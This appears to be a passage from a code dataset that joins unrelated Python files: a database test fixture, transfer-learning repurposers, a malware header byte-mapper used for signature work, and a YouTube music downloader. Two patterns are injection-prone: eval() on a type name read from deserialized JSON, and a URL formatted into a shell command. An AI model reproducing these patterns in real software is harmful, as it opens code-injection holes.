self.log.info('Initializing video preview %s at port %d', source, port)
video = uibuilder.load_check_widget('video',
os.path.dirname(uibuilder.uifile) +
"/widgetpreview.ui")
video.set_size_request(*self.previewSize)
self.video_box.pack_start(video, fill=False,
expand=False, padding=0)
mix_audio_display = AudioDisplay(self.audio_box, source, uibuilder, has_volume)
player = VideoDisplay(video, mix_audio_display, port=port,
width=self.previewSize[0],
height=self.previewSize[1],
name=source.upper()
)
``` |
{
"source": "0xflotus/walrus",
"score": 2
} |
#### File: walrus/test/conftest.py
```python
import json
import os
import subprocess
import time
from typing import Any
import pytest
from sqlalchemy import create_engine, text
from sqlalchemy.orm import Session
CONTAINER_NAME = "walrus_db"
@pytest.fixture(scope="session")
def dockerize_database():
# Skip if we're using github actions CI
if not "GITHUB_SHA" in os.environ:
subprocess.call(["docker-compose", "up", "-d"])
# Wait for postgres to become healthy
for _ in range(10):
print(1)
out = subprocess.check_output(["docker", "inspect", CONTAINER_NAME])
container_info = json.loads(out)
container_health_status = container_info[0]["State"]["Health"]["Status"]
if container_health_status == "healthy":
time.sleep(1)
break
else:
time.sleep(1)
else:
raise Exception("Container never became healthy")
yield
subprocess.call(["docker-compose", "down", "-v"])
return
yield
@pytest.fixture(scope="session")
def engine(dockerize_database):
eng = create_engine(f"postgresql://postgres:postgres@localhost:5432/postgres")
yield eng
eng.dispose()
@pytest.fixture(scope="function")
def sess(engine):
conn = engine.connect()
conn.execute(
text(
"""
set search_path = '';
create table public.note(
id bigserial primary key,
user_id uuid not null,
body text not null,
arr_text text[] not null default array['one', 'two'],
arr_int int[] not null default array[1, 2],
-- dummy column with revoked select for "authenticated"
dummy text
);
create index ix_note_user_id on public.note (user_id);
create table public.unauthorized(
id bigserial primary key
);
drop publication if exists supabase_realtime;
create publication
supabase_realtime
for table
public.note,
public.unauthorized
with (
publish = 'insert,update,delete,truncate'
);
"""
)
)
conn.execute(text("commit"))
conn.execute(
text(
"""
select * from pg_create_logical_replication_slot('realtime', 'wal2json', false);
"""
)
)
conn.execute(text("commit"))
# Bind a session to the top level transaction
_session = Session(bind=conn)
yield _session
# Close the session object
_session.rollback()
_session.close()
# Cleanup between tests
conn.execute(
"""
select pg_drop_replication_slot('realtime');
"""
)
conn.execute(
"""
drop schema public cascade;
create schema public;
drop publication supabase_realtime;
"""
)
conn.execute(
"""
grant usage on schema public to authenticated;
alter default privileges in schema public grant all on tables to authenticated;
alter default privileges in schema public grant all on functions to authenticated;
alter default privileges in schema public grant all on sequences to authenticated;
truncate table cdc.subscription cascade;
"""
)
conn.execute(text("commit"))
conn.close()
def pytest_addoption(parser: Any) -> None:
parser.addoption(
"--run-perf",
action="store_true",
default=False,
help="run performance check",
)
def pytest_collection_modifyitems(config: Any, items: Any) -> None:
if not config.getoption("--run-perf"):
skip = pytest.mark.skip(reason="performance test. Use --run-perf to run")
for item in items:
if "performance" in item.keywords:
item.add_marker(skip)
return
``` |
{
"source": "0xflotus/wax",
"score": 3
} |
#### File: wax/tools/concat.py
```python
import re
from glob import glob
def min_c(src):
lines = src.split("\n")
out = ""
i = 0
cont = False
while i < len(lines):
l = lines[i].split("//")[0];
l = re.sub(r'\/\*.*?\*\/','',l);
if (not len(l.strip())):
i+=1
continue
if l.strip()[-1] == '\\':
cont = True
l = l.strip()[0:-1]
if (l.strip()[0] == '#'):
out += "\n"
out += l.strip()
if not cont:
out += "\n"
elif cont:
out += " "
out += l.strip()
else:
if not len(l[0].strip()) or l.strip()[0] == '}':
out += l.strip()
else:
out += "\n"
out += l.strip()
if lines[i].split("//")[0].strip()[-1] != '\\':
cont = False
i+=1
out = out.replace("\n\n","\n").replace("\n\n","\n").strip()
return out
def min_wax(src):
return src.replace("\n"," ").strip()
def min_java(src):
return min_c(src)
def min_ts(src):
return src.replace("\n\n","\n");
def to_cstr(src):
return '"'+src.replace('"','\\"').replace("\n",'\\n"\n"')+'\\n"'
paths = glob("../src/std/std.*")+glob("../src/std/*.wax")
out = "/*GENERATED BY TOOLS/CONCAT.PY (DO NOT EDIT)*/\n#ifndef WAX_STD_TEXT\n#define WAX_STD_TEXT\n"
for p in paths:
p = p.replace('\\','/')
ext = p.split(".")[-1]
f = open(p,'r').read()
g = globals()['min_'+ext](f)
h = to_cstr(g)
name = "TEXT_"+p.split("/")[-1].replace("/","_").replace("\\","_").replace(".","_")
out += "const char* "+name+" = "+h+";\n"
out += "\n#endif\n"
open("../src/text.c",'w').write(out)
``` |
{
"source": "0xflotus/xfer",
"score": 2
} |
#### File: xfer/xfer/gp_repurposer.py
```python
import mxnet as mx
import numpy as np
from sklearn.preprocessing import LabelBinarizer, Normalizer
from .meta_model_repurposer import MetaModelRepurposer
from .constants import gp_repurposer_keys as keys
from .constants import repurposer_keys
from . import utils
class GpRepurposer(MetaModelRepurposer):
"""
Repurpose source neural network to create a Gaussian Process (GP) meta-model through Transfer Learning.
:param source_model: Source neural network to do transfer learning from.
:type source_model: :class:`mxnet.mod.Module`
:param feature_layer_names: Name of layer(s) in source_model from which features should be transferred.
:type feature_layer_names: list[str]
:param context_function: MXNet context function that provides device type context.
:type context_function: function(int)->:class:`mx.context.Context`
:param int num_devices: Number of devices to use to extract features from source_model.
:param int max_function_evaluations: Maximum number of function evaluations to perform in GP optimization.
:param bool apply_l2_norm: Whether to apply L2 normalization after extracting features from source neural network.
If set to True, L2 normalization will be applied to features before passing to GP during
training and prediction.
"""
def __init__(self, source_model: mx.mod.Module, feature_layer_names, context_function=mx.context.cpu, num_devices=1,
max_function_evaluations=100, apply_l2_norm=False):
# Call base class constructor with parameters required for meta-models
super().__init__(source_model, feature_layer_names, context_function, num_devices)
self.max_function_evaluations = max_function_evaluations
self.apply_l2_norm = apply_l2_norm
# Mean of features to use for normalization. Computed in training phase.
# Used to normalize features in training and in prediction.
self.feature_mean = None
# Optimizer to use for training GP model
self.optimizer = 'lbfgs'
# Number of inducing points to use for sparse GP
self.NUM_INDUCING_SPARSE_GP = 100
# Normalizer to use when apply_l2_norm flag is set
self.l2_normalizer = Normalizer(norm='l2')
def _train_model_from_features(self, features, labels, feature_indices_per_layer):
"""
Train GP classification models using features extracted from the source neural network.
:param features: Features extracted from source neural network.
:type features: :class:`numpy.ndarray`
:param labels: Labels to use for training.
:type labels: :class:`numpy.ndarray`
:param feature_indices_per_layer: Mapping of feature_layer_names to dimension indices in features array
i.e. {layer_name, feature_indices}.
Used to build separate kernels for features from different layers.
:type feature_indices_per_layer: OrderedDict[str, :class:`numpy.ndarray`]
:return: List of GP classification models trained for each class (one-vs-all) in given training data.
List of Sparse GP models returned if number of training instances is greater than
NUM_INDUCING_SPARSE_GP.
If there are only two classes in training data, then the output list contains a single model.
:rtype: list[:class:`GPy.models.GPClassification`] or list[:class:`GPy.models.SparseGPClassification`]
"""
# Normalize features to train on
self.feature_mean = features.mean(axis=0) # Compute mean for each feature across all training instances
normalized_features = features - self.feature_mean # Normalize features to have zero mean
if self.apply_l2_norm: # Apply L2 normalization if flag is set
normalized_features = self.l2_normalizer.fit_transform(normalized_features)
# Binarize labels in a one-vs-all fashion to train a separate model for each class
# Output contains 'c' columns (c=number of classes) and each column contains binary labels w.r.t to that class.
# If number of classes is two, then the output contains a single column with values 0 and 1
binarized_labels = LabelBinarizer().fit_transform(labels)
# Build kernel using given feature indices
kernel = self._build_kernel(feature_indices_per_layer)
# Do spare GP if number of training instances is greater than chosen number of inducing points
# Otherwise, do normal GP classification because the data set is small
num_training_instances = features.shape[0]
do_sparse_gp = (num_training_instances > self.NUM_INDUCING_SPARSE_GP)
# Train a GP model for each class (one-vs-all) if there are more than two classes, and one model if there
# are only two classes
num_models = binarized_labels.shape[1]
models = [None] * num_models
for model_index in range(num_models):
binary_labels_for_current_class = binarized_labels[:, model_index:model_index+1]
input_kernel = kernel.copy() # Pass copy of kernel to avoid original kernel being updated by GPy
models[model_index] = self._train_model_for_binary_label(binary_label=binary_labels_for_current_class,
features=normalized_features,
kernel=input_kernel,
do_sparse_gp=do_sparse_gp)
return models
def _train_model_for_binary_label(self, features, binary_label, kernel, do_sparse_gp):
# GPy is imported here in order to avoid importing it during 'import xfer'
import GPy
# Train a GPy model for binary classification with given features and kernel
if do_sparse_gp:
model = GPy.models.SparseGPClassification(X=features, Y=binary_label, kernel=kernel,
num_inducing=self.NUM_INDUCING_SPARSE_GP)
else:
model = GPy.models.GPClassification(X=features, Y=binary_label, kernel=kernel)
model.optimize(optimizer=self.optimizer, max_iters=self.max_function_evaluations)
return model
@staticmethod
def _build_kernel(feature_indices_per_layer):
"""
Build separate RBF kernels for features from different layers and return the kernel that results from adding all
feature specific kernels.
:param feature_indices_per_layer: Mapping of feature_layer_names to dimension indices in features array
i.e. {layer_name, feature_indices}.
:type feature_indices_per_layer: dict[str, :class:`numpy.ndarray`]
:return: GPy RBF kernel if all features are from single layer or GPy Add kernel if features are from multiple
layers.
:rtype: :class:`GPy.kern.RBF` or :class:`GPy.kern.Add`
"""
# GPy is imported here in order to avoid importing it during 'import xfer'
import GPy
all_kernels = None
for layer_name in feature_indices_per_layer:
active_dims = feature_indices_per_layer[layer_name] # feature indices corresponding to current layer
kernel = GPy.kern.RBF(input_dim=active_dims.size, name=layer_name, active_dims=active_dims.tolist())
if all_kernels is None:
all_kernels = kernel
else:
all_kernels += kernel
return all_kernels
def _predict_probability_from_features(self, features):
"""
Compute predictions using self.target_model with features extracted from source neural network.
self.target_model is a list of GP classification models trained for each class in a one-vs-all fashion.
Use GPy's predict method on each model and compute probabilities predicted for individual classes.
The individual class probabilities are then normalized such that their sum is 1.
:param features: Features extracted from source neural network.
:type features: :class:`numpy.ndarray`
:return: Normalized one-vs-all probabilities.
:rtype: :class:`numpy.ndarray`
"""
normalized_features = features - self.feature_mean # Normalize features using the training features' means
if self.apply_l2_norm: # Apply L2 normalization if flag is set
normalized_features = self.l2_normalizer.transform(normalized_features)
num_gp_models = len(self.target_model)
if num_gp_models == 1:
# When there are only two classes, get probability for class_1 (P) and calculate probability for class_0
# (1-P)
prediction, _ = self.target_model[0].predict(normalized_features)
normalized_predictions = np.hstack([1.0-prediction, prediction])
else:
# When there are more than two classes, get one-vs-all prediction scores for each class
# from binary GP models
predictions_per_class = []
for model_id in range(num_gp_models):
binary_gp_model = self.target_model[model_id]
binary_prediction, _ = binary_gp_model.predict(normalized_features)
predictions_per_class.append(binary_prediction)
# Convert scores list to numpy array
predictions = np.nan_to_num(np.hstack(predictions_per_class))
# Normalize individual predictions to sum up to 1
sum_of_predictions_per_instance = np.sum(predictions, axis=1).reshape(predictions.shape[0], 1)
normalized_predictions = predictions / sum_of_predictions_per_instance
return normalized_predictions
def _predict_label_from_features(self, features):
"""
Return labels predicted using target_model with features extracted from source neural network.
target_model is a list of GP classification models trained for each class in a one-vs-all fashion.
Using GPy's predict method, compute one-vs-all probabilities per class and return the class with
maximum probability.
:param features: Features extracted from source neural network.
:type features: :class:`numpy.ndarray`
:return: Predicted labels i.e. Class with maximum probability for each test instance.
:rtype: :class:`numpy.ndarray`
"""
predictions = self._predict_probability_from_features(features)
labels = np.argmax(predictions, axis=1) # Select label with maximum prediction for each test instance
return labels
def get_params(self):
"""
Get parameters of repurposer that are in the constructor's argument list.
:rtype: dict
"""
params_dict = super().get_params()
params_dict[keys.MAX_FUNCTION_EVALUATIONS] = self.max_function_evaluations
params_dict[keys.APPLY_L2_NORM] = self.apply_l2_norm
return params_dict
def _get_attributes(self):
"""
Get parameters of repurposer not in constructor's argument list.
:rtype: dict
"""
attributes_dict = super()._get_attributes()
attributes_dict[keys.OPTIMIZER] = self.optimizer
attributes_dict[keys.NUM_INDUCING_SPARSE_GP] = self.NUM_INDUCING_SPARSE_GP
attributes_dict[keys.FEATURE_MEAN] = self.feature_mean.tolist()
return attributes_dict
def _set_attributes(self, input_dict):
"""
Set attributes of class from input_dict.
These attributes are the same as those returned by get_attributes method.
:param input_dict: Dictionary containing attribute values.
:return: None
"""
super()._set_attributes(input_dict)
self.optimizer = input_dict[keys.OPTIMIZER]
self.NUM_INDUCING_SPARSE_GP = input_dict[keys.NUM_INDUCING_SPARSE_GP]
self.feature_mean = np.array(input_dict[keys.FEATURE_MEAN])
def serialize(self, file_prefix):
"""
Serialize the GP repurposer (model and supporting info) and save to file.
:param str file_prefix: Prefix of file path to save the serialized repurposer to.
:return: None
"""
# Get constructor params. This will be used to recreate repurposer object in deserialization flow.
output_dict = {repurposer_keys.PARAMS: self.get_params()}
# Get rest of the attributes to save with the repurposer.
output_dict.update(self._get_attributes())
# Serialize the GP models and save to output dictionary
output_dict[repurposer_keys.TARGET_MODEL] = self._serialize_target_gp_models(save_data=True)
# Save the serialized params and attributes to file
utils.save_json(file_prefix, output_dict)
def deserialize(self, input_dict):
"""
Uses dictionary to set attributes of repurposer.
:param dict input_dict: Dictionary containing values for attributes to be set to.
:return: None
"""
# Set attributes of the repurposer from input_dict
self._set_attributes(input_dict)
# Deserialize and set the target GP models
self.target_model = self._deserialize_target_gp_models(input_dict[repurposer_keys.TARGET_MODEL])
def _serialize_target_gp_models(self, save_data=True):
# Serialize the gp models trained per class and add to output list
serialized_models = []
for model in self.target_model:
serialized_models.append(model.to_dict(save_data=save_data))
return serialized_models
@staticmethod
def _deserialize_target_gp_models(serialized_target_model):
# GPy is imported here in order to avoid importing it during 'import xfer'
import GPy
# Deserialize the GP models trained per class and return
deserialized_models = []
for model_dict in serialized_target_model:
deserialized_models.append(GPy.core.Model.from_dict(model_dict))
return deserialized_models
```
#### File: xfer/prob/obs.py
```python
import mxnet.ndarray as nd
from .prob_base import Probability
class Likelihood(Probability):
def __init__(self, ctx):
super(Likelihood, self).__init__(None, ctx)
class Categorical(Likelihood):
def __init__(self, ctx):
super(Categorical, self).__init__(ctx)
def set_unnormalized_mean(self, unnormalized_mean):
self.unnormalized_mean = unnormalized_mean
def log_pdf(self, y):
return nd.sum(nd.nansum(y * nd.log_softmax(self.unnormalized_mean), axis=0, exclude=True))
```
#### File: xfer/xfer/svm_repurposer.py
```python
import mxnet as mx
from sklearn.svm import SVC
from .meta_model_repurposer import MetaModelRepurposer
from .constants import repurposer_keys
from .constants import meta_model_repurposer_keys as keys
from . import utils
class SvmRepurposer(MetaModelRepurposer):
"""
Perform Transfer Learning through a Support Vector Machine (SVM) meta-model which repurposes the source neural
network.
:param source_model: Source neural network to do transfer learning from.
:type source_model: :class:`mxnet.mod.Module`
:param feature_layer_names: Name of layer(s) in source_model from which features should be transferred.
:type feature_layer_names: list[str]
:param context_function: MXNet context function that provides device type context.
:type context_function: function(int)->:class:`mx.context.Context`
:param int num_devices: Number of devices to use to extract features from source_model.
:param float c: Penalty parameter C of the error term.
:param string kernel: Specifies the kernel type to be used in the SVM algorithm in sklearn library. It must
be one of 'linear', 'poly', 'rbf', 'sigmoid', 'precomputed' or a callable.
:param float gamma: Kernel coefficient for 'rbf', 'poly' and 'sigmoid'. If gamma is 'auto' then 1/n_features will
be used instead.
:param bool enable_probability_estimates: Whether to enable probability estimates.
This must be enabled for predict_probability to work and will slow down
training.
"""
def __init__(self, source_model: mx.mod.Module, feature_layer_names, context_function=mx.cpu, num_devices=1,
c=1.0, kernel='linear', gamma='auto', enable_probability_estimates=False):
# Call base class constructor with parameters required for meta-models
super(SvmRepurposer, self).__init__(source_model, feature_layer_names, context_function, num_devices)
# Initialize SVM specific parameters
self.c = c
self.kernel = kernel
self.gamma = gamma
self.enable_probability_estimates = enable_probability_estimates
def get_params(self):
"""
Get parameters of repurposer that are in the constructor.
:rtype: dict
"""
param_dict = super(SvmRepurposer, self).get_params()
param_dict[keys.C] = self.c
param_dict[keys.KERNEL] = self.kernel
param_dict[keys.GAMMA] = self.gamma
param_dict[keys.PROB_ESTIMATES] = self.enable_probability_estimates
return param_dict
def _train_model_from_features(self, features, labels, feature_indices_per_layer=None):
"""
Train an SVM model using features extracted from source neural network.
:param features: Features extracted from source neural network.
:type features: :class:`numpy.ndarray`
:param labels: Labels to use for training.
:type labels: :class:`numpy.ndarray`
:param feature_indices_per_layer: Mapping of feature_layer_names to indices in features array
i.e. {layer_name, feature_indices} Note that this param is currently not
consumed by svm_repurposer.
:type feature_indices_per_layer: OrderedDict[str, :class:`numpy.ndarray`]
:return: SVM model trained with given features and labels using sci-kit learn library.
:rtype: :class: `sklearn.svm.SVC`
"""
svm_classifier = SVC(C=self.c,
kernel=self.kernel,
gamma=self.gamma,
decision_function_shape='ovr',
random_state=1,
probability=self.enable_probability_estimates)
svm_classifier.fit(features, labels)
return svm_classifier
def _predict_probability_from_features(self, features):
"""
Run predictions with target_model on features extracted from source neural network.
Use sklearn's SVM predict_proba method and return predicted probabilities.
:param features: Features extracted from source neural network.
:type features: :class:`numpy.ndarray`
:return: Predicted probabilities.
:rtype: :class:`numpy.ndarray`
"""
if not self.target_model.probability:
raise ValueError("Probability estimates should have been enabled during model training for this method to \
work")
return self.target_model.predict_proba(features)
def _predict_label_from_features(self, features):
"""
Run predictions with target_model on features extracted from source neural network.
Use sklearn's SVM predict method and return predicted labels.
:param features: Features extracted from source neural network.
:type features: :class:`numpy.ndarray`
:return: Predicted labels.
:rtype: :class:`numpy.ndarray`
"""
return self.target_model.predict(features)
def serialize(self, file_prefix):
"""
Saves repurposer (excluding source model) to file_prefix.json.
:param str file_prefix: Prefix to save file with.
"""
output_dict = {}
output_dict[repurposer_keys.PARAMS] = self.get_params()
output_dict[repurposer_keys.TARGET_MODEL] = utils.sklearn_model_to_dict(self.target_model)
output_dict.update(self._get_attributes())
utils.save_json(file_prefix, output_dict)
def deserialize(self, input_dict):
"""
Uses dictionary to set attributes of repurposer.
:param dict input_dict: Dictionary containing values for attributes to be set to.
"""
self._set_attributes(input_dict) # Set attributes of the repurposer from input_dict
self.target_model = utils.sklearn_model_from_dict(SVC, input_dict[repurposer_keys.TARGET_MODEL])
```
#### File: xfer/xfer/utils.py
```python
import numpy as np
import os
import mxnet as mx
import json
from .constants import serialization_constants as consts
from .constants import repurposer_keys as keys
def sklearn_model_to_dict(target_model):
output_dict = {}
import copy
# model_dict contains all attributes of model
model_dict = copy.deepcopy(target_model.__dict__)
for k in model_dict:
# Replace any numpy array with [data_type_as_str, array_as_list]
# e.g np.array([1,2]) -> ['int', [1,2]]
if isinstance(model_dict[k], np.ndarray):
type_data = str(model_dict[k].dtype)
model_dict[k] = [type_data, model_dict[k].tolist()]
# Replace any tuple with ['tuple', tuple_as_list]
# e.g (1,2) -> ['tuple', [1,2]]
if isinstance(model_dict[k], tuple):
model_dict[k] = [keys.TUPLE, list(model_dict[k])]
output_dict[keys.MODEL] = {}
# Model params are public attributes
output_dict[keys.MODEL][keys.PARAMS] = target_model.get_params()
# Serialise all private attributes
output_dict[keys.MODEL][keys.ATTRS] = {}
for k in model_dict:
# Serialize private parameters as attributes
if k[-1] == '_' or k[0] == '_':
output_dict[keys.MODEL][keys.ATTRS][k] = model_dict[k]
return output_dict
def sklearn_model_from_dict(model_class, input_dict):
# Initialize model with serialized model parameters
model = model_class(**input_dict[keys.MODEL][keys.PARAMS])
# Set model attributes
for k in input_dict[keys.MODEL][keys.ATTRS]:
# Unpack tuples and np.arrays that were serialised as lists
if isinstance(input_dict[keys.MODEL][keys.ATTRS][k], list) \
and isinstance(input_dict[keys.MODEL][keys.ATTRS][k][0], str) \
and type(input_dict[keys.MODEL][keys.ATTRS][k][1]) == list:
if input_dict[keys.MODEL][keys.ATTRS][k][0] == keys.TUPLE:
setattr(model, k, tuple(input_dict[keys.MODEL][keys.ATTRS][k][1]))
else:
type_data = 'np.' + input_dict[keys.MODEL][keys.ATTRS][k][0]
type_data = eval(type_data)
setattr(model, k, np.array(input_dict[keys.MODEL][keys.ATTRS][k][1], dtype=type_data))
else:
setattr(model, k, input_dict[keys.MODEL][keys.ATTRS][k])
return model
def _assert_repurposer_file_exists(repurposer_file_list):
for file_name in repurposer_file_list:
if not os.path.isfile(file_name):
raise NameError('Cannot find repurposer file ({})'.format(file_name))
def save_mxnet_model(model, file_path_prefix, epoch, provide_data=None, provide_label=None):
if not model.binded:
if provide_data is None or provide_label is None:
raise ValueError("provide_data and provide_label are required because mxnet module is not binded")
model.bind(data_shapes=provide_data, label_shapes=provide_label)
model.save_checkpoint(file_path_prefix, epoch)
def save_json(file_prefix, output_dict):
with open(file_prefix + consts.JSON_SUFFIX, mode='w') as fp:
json.dump(obj=output_dict, fp=fp)
def serialize_ctx_fn(context_function):
if context_function == mx.cpu:
return keys.CPU
elif context_function == mx.gpu:
return keys.GPU
else:
raise ValueError('Unexpected context function {}'.format(context_function))
def deserialize_ctx_fn(context_function):
if context_function == keys.CPU:
return mx.cpu
elif context_function == keys.GPU:
return mx.gpu
else:
raise ValueError('Unexpected context function {}'.format(context_function))
``` |
{
"source": "0xflotus/yarGen",
"score": 2
} |
#### File: yarGen/tools/byte-mapper.py
```python
import os
import sys
import argparse
import re
import traceback
from colorama import Fore, Back, Style
from colorama import init
from hashlib import md5
def getFiles(dir, recursive):
# Recursive
if recursive:
for root, directories, files in os.walk (dir, followlinks=False):
for filename in files:
filePath = os.path.join(root,filename)
yield filePath
# Non recursive
else:
for filename in os.listdir(dir):
filePath = os.path.join(dir,filename)
yield filePath
def parseDir(dir, recursive, numBytes):
# Prepare dictionary
byte_stats = {}
fileCount = 0
for filePath in getFiles(dir, recursive):
if os.path.isdir(filePath):
if recursive:
parseDir(dir, recursive, numBytes)
continue
with open(filePath, 'r') as file:
fileCount += 1
header = file.read(int(numBytes))
pos = 0
for byte in header:
pos += 1
if pos in byte_stats:
if byte in byte_stats[pos]:
byte_stats[pos][byte] += 1
else:
byte_stats[pos][byte] = 1
else:
#byte_stats.append(pos)
byte_stats[pos] = { byte: 1 }
return byte_stats, fileCount
def visiualizeStats(byteStats, fileCount, heatMapMode, byteFiller, bytesPerLine):
# Settings
# print fileCount
bytesPrinted = 0
for byteStat in byteStats:
if args.d:
print "------------------------"
print byteStats[byteStat]
byteToPrint = ".."
countOfByte = 0
highestValue = 0
# Evaluate the most often occured byte value at this position
for ( key, val ) in byteStats[byteStat].iteritems():
if val > highestValue:
highestValue = val
byteToPrint = key
countOfByte = val
# Heat Map Mode
if heatMapMode:
printHeatMapValue(byteToPrint, countOfByte, fileCount, byteFiller)
# Standard Mode
else:
if countOfByte >= fileCount:
sys.stdout.write("%s%s" % ( byteToPrint.encode('hex'), byteFiller ))
else:
sys.stdout.write("..%s" % byteFiller)
# Line break
bytesPrinted += 1
if bytesPrinted >= bytesPerLine:
sys.stdout.write("\n")
bytesPrinted = 0
# Print Heat Map Legend
printHeatLegend(int(fileCount))
def printHeatMapValue(byteToPrint, countOfByte, fileCount, byteFiller):
if args.d:
print "Count of byte: %s" % countOfByte
print "File Count: %s" % fileCount
if countOfByte == fileCount:
sys.stdout.write(Fore.GREEN + '%s' % byteToPrint.encode('hex') + Fore.WHITE + '%s' % byteFiller)
elif countOfByte == fileCount - 1:
sys.stdout.write(Fore.CYAN + '%s' % byteToPrint.encode('hex') + Fore.WHITE + '%s' % byteFiller)
elif countOfByte == fileCount - 2:
sys.stdout.write(Fore.YELLOW + '%s' % byteToPrint.encode('hex') + Fore.WHITE + '%s' % byteFiller)
elif countOfByte == fileCount - 3:
sys.stdout.write(Fore.RED + '%s' % byteToPrint.encode('hex') + Fore.WHITE + '%s' % byteFiller)
elif countOfByte == fileCount - 4:
sys.stdout.write(Fore.MAGENTA + '%s' % byteToPrint.encode('hex') + Fore.WHITE + '%s' % byteFiller)
elif countOfByte == fileCount - 5:
sys.stdout.write(Fore.WHITE + '%s' % byteToPrint.encode('hex') + Fore.WHITE + '%s' % byteFiller)
else:
sys.stdout.write(Fore.WHITE + Style.DIM + '..' + Fore.WHITE + Style.RESET_ALL + '%s' % byteFiller)
def printHeatLegend(fileCount):
print ""
print Fore.GREEN + 'GREEN\tContent of all %s files' % str(fileCount) + Fore.WHITE
if fileCount > 1:
print Fore.CYAN + 'CYAN\tContent of %s files' % str(fileCount-1) + Fore.WHITE
if fileCount > 2:
print Fore.YELLOW + 'YELLOW\tContent of %s files' % str(fileCount-2) + Fore.WHITE
if fileCount > 3:
print Fore.RED + 'RED\tContent of %s files' % str(fileCount-3) + Fore.WHITE
if fileCount > 4:
print Fore.MAGENTA + 'MAGENTA\tContent of %s files' % str(fileCount-4) + Fore.WHITE
if fileCount > 5:
print Fore.WHITE + 'WHITE\tContent of %s files' % str(fileCount-5) + Fore.WHITE
if fileCount > 6:
print Fore.WHITE + Style.DIM +'..\tNo identical bytes in more than %s files' % str(fileCount-6) + Fore.WHITE + Style.RESET_ALL
# MAIN ################################################################
if __name__ == '__main__':
# Parse Arguments
parser = argparse.ArgumentParser(description='Yara BSG')
parser.add_argument('-p', metavar="malware-dir", help='Path to scan for malware')
parser.add_argument('-r', action='store_true', default=False, help='Be recursive')
parser.add_argument('-m', action='store_true', default=False, help='Heat map on byte values')
parser.add_argument('-f', default=" ", metavar="byte-filler", help='character to fill the gap between the bytes (default: \' \')')
parser.add_argument('-c', default=None, metavar="num-occurances", help='Print only bytes that occur in at least X of the samples (default: all files; incompatible with heat map mode) ')
parser.add_argument('-b', default=1024, metavar="bytes", help='Number of bytes to print (default: 1024)')
parser.add_argument('-l', default=16, metavar="bytes-per-line", help='Number of bytes to print per line (default: 16)')
parser.add_argument('-d', action='store_true', default=False, help='Debug Info')
args = parser.parse_args()
# Colorization
init()
# Parse the Files
( byteStats, fileCount) = parseDir(args.p, args.r, args.b)
# print byteStats
if args.c != None and not args.m:
fileCount = int(args.c)
# Vizualize Byte Stats
visiualizeStats(byteStats, fileCount, args.m, args.f, args.l)
``` |
{
"source": "0xflotus/ytmdl",
"score": 3
} |
#### File: ytmdl/ytmdl/yt.py
```python
import requests
from bs4 import BeautifulSoup
import os
import youtube_dl
import re
from ytmdl import defaults, utility
from downloader_cli.download import Download
import traceback
from ytmdl.logger import Logger
logger = Logger("yt")
def get_youtube_streams(url):
"""Get both audio & vidoe stream urls for youtube using youtube-dl.
PS: I don't know how youtube-dl does the magic
"""
cli = "youtube-dl -g {}".format(url)
output, error = utility.exe(cli)
stream_urls = output.split("\n")
url = stream_urls[1]
return url
def GRAB_SONG(link):
"""Return true if the song is downloaded else false."""
ydl_opts = {
'format': 'bestaudio',
'quiet': True,
'outtmpl': os.path.join(defaults.DEFAULT.SONG_TEMP_DIR,
'%(title)s.%(ext)s'),
'postprocessors': [{
'key': 'FFmpegExtractAudio',
'preferredcodec': 'mp3',
'preferredquality': defaults.DEFAULT.SONG_QUALITY
}]
}
# Download the song with youtube-dl
try:
ydl = youtube_dl.YoutubeDL(ydl_opts)
ydl.download([link])
return True
except TimeoutError:
print('Timed Out! Are you connected to internet?\a')
return False
else:
return False
def dw(value, song_name='ytmdl_temp.mp3'):
"""Download the song."""
try:
# Get the audio stream link
url = get_youtube_streams(value)
# If song_name doesnt have mp3 extension, add it
if not song_name.endswith('.mp3'):
song_name += '.mp3'
# Replace the spaces with hashes
song_name = song_name.replace(' ', '#')
song_name = song_name.replace('/', '#')
# The directory where we will download to.
dw_dir = defaults.DEFAULT.SONG_TEMP_DIR
logger.info("Saving the files to: {}".format(dw_dir))
if not os.path.exists(dw_dir):
os.makedirs(dw_dir)
# Name of the temp file
name = os.path.join(dw_dir, song_name)
# Start downloading the song
Download(url, name).download()
return name
except Exception as e:
traceback.print_exception(e)
return e
def get_href(url):
"""Get the watch? part of the url in case of urls."""
pos_watch = url.index('/watch?v=')
part = url[pos_watch:]
return part
def search(querry, bettersearch, kw=[], lim=10):
"""Search the querry in youtube and return lim number of results.
Querry is the keyword, i:e name of the song
lim is the number of songs that will be added to video array and returned
"""
# Add keywords if better search is enabled
if bettersearch:
for keyword in kw:
if keyword is not None:
querry += ' ' + keyword
# Replace all the spaces with +
querry = querry.replace(' ', '+')
url = "https://www.youtube.com/results?search_query={}".format(querry)
response = requests.get(url)
soup = BeautifulSoup(response.text, "lxml")
videos = soup.findAll('div', attrs={'class': 'yt-lockup-content'})
if not videos:
return []
if len(videos) > lim:
videos = videos[:lim]
extracted_data = []
for video in videos:
a = video.find_all('a')
data = {}
data['title'] = a[0]['title']
data['href'] = a[0]['href']
data['author_name'] = a[1].text
duration_unprocessed = video.span.text
duration = re.sub(r'\ |\-|\.|Duration', '', duration_unprocessed)
data['duration'] = re.subn(r':', '', duration, 1)[0]
extracted_data.append(data)
return extracted_data
def scan_video(url):
"""Scan the link of the video and return data and."""
try:
search_tmplt = "http://www.youtube.com/oembed?url={}&format=json"
search_url = search_tmplt.format(url)
r = requests.get(search_url)
if r.status_code == 200:
return r.json()
else:
return "Unauthorized"
except Exception:
return False
if __name__ == '__main__':
print(defaults.DEFAULT.SONG_QUALITY)
``` |
{
"source": "0xflotus/zeckendorf-1",
"score": 4
} |
#### File: zeckendorf-1/zeckendorf/binary.py
```python
from zeckendorf.base import _fibs, _negafibs, negazeck, zeck
def _ordered_in(contained, container):
"""
A version of (item in container for item in contained) for the case
where container is an iterable whose items appear in the same order
as they do in contained.
:param contained: an iterable of values that would go on the left
side of the "in" operator.
:param container: an iterable that would go on the right side of
the "in" operator. Doesn't have to be a container.
:type contained: Iterable
:type container: Iterable
:return: an iterator of True and False values.
:rtype: Iterator[bool]
"""
for item in container:
for nxt in contained:
if nxt == item:
yield True
break
yield False
def fromiter(iterable):
"""
Construct a binary number from a finite iterable, where the ith bit
from the right is the truth value of the iterable's ith item.
:param iterable: any iterable, usually one with boolean values.
:type iterable: Iterable
:return: the binary number.
:rtype: int
"""
return sum(1 << i for i, obj in enumerate(iterable) if obj)
def fromzeck(zeck, nega=False):
"""
Construct a binary number from a finite stream of Fibonacci numbers,
where the ith bit from the right is 1 if and only if the (i + 2)th
Fibonacci number appears in the stream.
:param zeck: a stream of Fibonacci numbers ordered from largest to
